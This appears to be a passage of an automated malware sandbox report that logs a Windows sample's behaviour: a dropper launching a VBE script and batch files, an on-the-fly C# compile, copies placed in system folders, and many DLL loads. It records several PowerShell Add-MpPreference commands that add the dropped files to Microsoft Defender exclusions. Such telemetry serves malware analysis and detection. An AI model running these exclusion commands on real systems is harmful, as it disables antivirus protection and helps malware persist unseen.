                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: 3AAyq819Vy.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeFile read: C:\Users\user\Desktop\3AAyq819Vy.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\3AAyq819Vy.exe "C:\Users\user\Desktop\3AAyq819Vy.exe"
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\hyperContaineragent\Bridgecommon.exe "C:\hyperContaineragent/Bridgecommon.exe"
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4DA.tmp" "c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP"
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\hyperContaineragent\Bridgecommon.exe C:\hyperContaineragent\Bridgecommon.exe
                                    Source: unknownProcess created: C:\hyperContaineragent\Bridgecommon.exe C:\hyperContaineragent\Bridgecommon.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                    Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe"
                                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                    Source: unknownProcess created: C:\hyperContaineragent\Bridgecommon.exe "C:\hyperContaineragent\Bridgecommon.exe"
                                    Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                    Source: unknownProcess created: C:\hyperContaineragent\Bridgecommon.exe "C:\hyperContaineragent\Bridgecommon.exe"
                                    Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                    Source: unknownProcess created: C:\hyperContaineragent\Bridgecommon.exe "C:\hyperContaineragent\Bridgecommon.exe"
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\hyperContaineragent\Bridgecommon.exe "C:\hyperContaineragent/Bridgecommon.exe"Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline"Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe'Jump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4DA.tmp" "c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe"
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: version.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
